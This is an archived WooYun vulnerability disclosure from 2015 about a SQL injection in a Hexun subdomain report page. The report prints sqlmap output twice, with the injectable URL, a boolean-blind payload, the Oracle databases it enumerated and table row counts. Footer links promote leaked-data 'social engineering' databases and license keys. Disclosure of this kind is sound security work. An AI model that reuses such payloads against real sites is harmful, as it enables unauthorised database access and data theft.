和讯网某分站SQL注射漏洞之和讯网某分站(明文账号密码)
- 发表于
- WooYun漏洞库
漏洞概要
缺陷编号:WooYun-2015-0125699
漏洞标题:和讯网某分站SQL注射漏洞之和讯网某分站(明文账号密码)
相关厂商:和讯网
漏洞作者:安全小飞侠
提交时间:2015-07-09 17:31
公开时间:2015-08-23 17:34
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
漏洞详情
披露状态:
2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-09: 厂商已经确认,细节仅向厂商公开
2015-07-19: 细节向核心白帽子及相关领域专家公开
2015-07-29: 细节向普通白帽子公开
2015-08-08: 细节向实习白帽子公开
2015-08-23: 细节向公众公开
简要描述:
请叫我安全小飞侠,谢谢!
详细说明:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | http://baidu.hexun.com/report/ifread.php?t=1&id=617695注射参数: idURI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an<br> y)? [y/N] N<br> sqlmap identified the following injection points with a total of 81 HTTP(s) requ<br> ests:<br> ---<br> Parameter: #1* (URI)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: http://baidu.hexun.com:80/report/ifread.php?t=1&id=617695 AND 7598=<br> 7598<br> ---<br> [16:04:00] [INFO] testing MySQL<br> [16:04:01] [WARNING] the back-end DBMS is not MySQL<br> [16:04:01] [INFO] testing Oracle<br> [16:04:01] [INFO] confirming Oracle<br> [16:04:02] [INFO] the back-end DBMS is Oracle<br> back-end DBMS: Oracleavailable databases [9]:<br> [*] BDFIN<br> [*] CTXSYS<br> [*] EXFSYS<br> [*] MDSYS<br> [*] OLAPSYS<br> [*] REPDBO<br> [*] SYS<br> [*] SYSTEM<br> [*] WMSYS |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | +------------------------+---------+<br> | Table | Entries |<br> +------------------------+---------+<br> | FUTURES_QUOTE | 26984041 |<br> | R_STOCKS_SECTOR | 3604361 |<br> | TB_HJ_TTJ | 2477437 |<br> | TB_STOCK_BOARD | 2215113 |<br> | VOTE | 2186237 |<br> | TB_SGE_QUOTE | 1463523 |<br> | TB_METAL_QUOTE | 1438797 |<br> | USA_STOCK_QUOTE_TMP | 1067821 |<br> | R_INFO_O | 1029189 |<br> | TB_STOCK_BOARD_INDEX | 865135 |<br> | R_INFO | 597134 |<br> | TB_TJS_FS | 525422 |<br> | TB_METAL_QUOTE_FX678 | 497540 |<br> | CS_TNCONT | 152035 |<br> | TB_STOCK_BOARD_MONITOR | 64100 |<br> | USA_STOCK_QUOTE | 48146 |<br> | TB_SW_HQ | 25045 |<br> | CODE_INFO | 22329 |<br> | STOCK_BOARD | 4311 |<br> | STOCK_BOARD_MONITOR | 4295 |<br> | R_STOCK | 4225 |<br> | R_INFO_2 | 3970 |<br> | TB_TJS_K | 2012 |<br> | R_SECTOR_TDX | 1986 |<br> | VOTE_MI | 925 |<br> | R_GRADE | 645 |<br> | USA_STOCK_CODE | 442 |<br> | R_INDUSTRY | 345 |<br> | CT_USERINFO | 289 |<br> | TRADINFO | 270 |<br> | CS_TNCONT_NEW | 209 |<br> | R_INSCODE | 146 |<br> | R_SECTOR | 134 |<br> | CS_TNCONF | 123 |<br> | MEMBER_STOCKS | 43 |<br> | FUTURES_CODE | 27 |<br> | AD_KB | 26 |<br> | TEST | 25 |<br> | MEMBER_STOCK_TRADE | 13 |<br> | MEMBER_STOCK_GROUPS | 11 |<br> | RP_TEST | 9 |<br> | ACCOUNT | 6 |<br> | REPORT_USER_ACCOUNT | 5 |<br> +------------------------+---------+ |
漏洞证明:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 | http://baidu.hexun.com/report/ifread.php?t=1&id=617695注射参数: idURI parameter '#1*' is vulnerable. Do you want to keep testing the others (if an<br> y)? [y/N] N<br> sqlmap identified the following injection points with a total of 81 HTTP(s) requ<br> ests:<br> ---<br> Parameter: #1* (URI)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: http://baidu.hexun.com:80/report/ifread.php?t=1&id=617695 AND 7598=<br> 7598<br> ---<br> [16:04:00] [INFO] testing MySQL<br> [16:04:01] [WARNING] the back-end DBMS is not MySQL<br> [16:04:01] [INFO] testing Oracle<br> [16:04:01] [INFO] confirming Oracle<br> [16:04:02] [INFO] the back-end DBMS is Oracle<br> back-end DBMS: Oracleavailable databases [9]:<br> [*] BDFIN<br> [*] CTXSYS<br> [*] EXFSYS<br> [*] MDSYS<br> [*] OLAPSYS<br> [*] REPDBO<br> [*] SYS<br> [*] SYSTEM<br> [*] WMSYS |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 | +------------------------+---------+<br> | Table | Entries |<br> +------------------------+---------+<br> | FUTURES_QUOTE | 26984041 |<br> | R_STOCKS_SECTOR | 3604361 |<br> | TB_HJ_TTJ | 2477437 |<br> | TB_STOCK_BOARD | 2215113 |<br> | VOTE | 2186237 |<br> | TB_SGE_QUOTE | 1463523 |<br> | TB_METAL_QUOTE | 1438797 |<br> | USA_STOCK_QUOTE_TMP | 1067821 |<br> | R_INFO_O | 1029189 |<br> | TB_STOCK_BOARD_INDEX | 865135 |<br> | R_INFO | 597134 |<br> | TB_TJS_FS | 525422 |<br> | TB_METAL_QUOTE_FX678 | 497540 |<br> | CS_TNCONT | 152035 |<br> | TB_STOCK_BOARD_MONITOR | 64100 |<br> | USA_STOCK_QUOTE | 48146 |<br> | TB_SW_HQ | 25045 |<br> | CODE_INFO | 22329 |<br> | STOCK_BOARD | 4311 |<br> | STOCK_BOARD_MONITOR | 4295 |<br> | R_STOCK | 4225 |<br> | R_INFO_2 | 3970 |<br> | TB_TJS_K | 2012 |<br> | R_SECTOR_TDX | 1986 |<br> | VOTE_MI | 925 |<br> | R_GRADE | 645 |<br> | USA_STOCK_CODE | 442 |<br> | R_INDUSTRY | 345 |<br> | CT_USERINFO | 289 |<br> | TRADINFO | 270 |<br> | CS_TNCONT_NEW | 209 |<br> | R_INSCODE | 146 |<br> | R_SECTOR | 134 |<br> | CS_TNCONF | 123 |<br> | MEMBER_STOCKS | 43 |<br> | FUTURES_CODE | 27 |<br> | AD_KB | 26 |<br> | TEST | 25 |<br> | MEMBER_STOCK_TRADE | 13 |<br> | MEMBER_STOCK_GROUPS | 11 |<br> | RP_TEST | 9 |<br> | ACCOUNT | 6 |<br> | REPORT_USER_ACCOUNT | 5 |<br> +------------------------+---------+ |
修复方案:
你懂的,抓紧修复吧
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2015-07-0917:33
厂商回复:
谢谢
最新状态:
暂无
评价
- 2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)
@安全小飞侠 Table | Entries | entries 这个参数怎么显示??
2010-01-01 00:00 安全小飞侠 白帽子 | Rank:66 漏洞数:6)@DloveJ --count 参数
2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)@安全小飞侠 嗯嗯,,谢谢,ok
原文连接:和讯网某分站SQL注射漏洞之和讯网某分站(明文账号密码) 所有媒体,可在保留署名、原文连接的情况下转载,若非则不得使用我方内容。
- 2020 Google镜像大全,谷歌镜像网址
- BT磁力搜索引擎大全
- Javaweb架构分析安全之万户ezoffice全版本通杀上传GETSHELL
- 东方网景某严重安全漏洞(可导致上万网站沦陷/域名劫持/FTP服务安全/集群安全等可受到影响)
- 暗网是什么?如何进入暗网?
- 最新ESET NOD32 License Key/激活码/许可证密钥/用户名密码
- No Access-Control-Allow-Origin 跨域错误解决
- 谷歌识图,以图搜图
- 社工库源码大全(持续更新)
- this channel is blocked because it was used:Telegram群组/频道屏蔽解决方法
- 【透明互联网】社工库 Social Engineering Data
- 怎么用图片搜索番号?
- 9部有史以来最好的黑客电影
- 一个绕过Google谷歌验证码(reCAPTCHA)的方法
- 手机BT/种子下载,手机磁力链下载软件整理
扫码分享
验证:
体验盒子扫码分享
打赏零钱
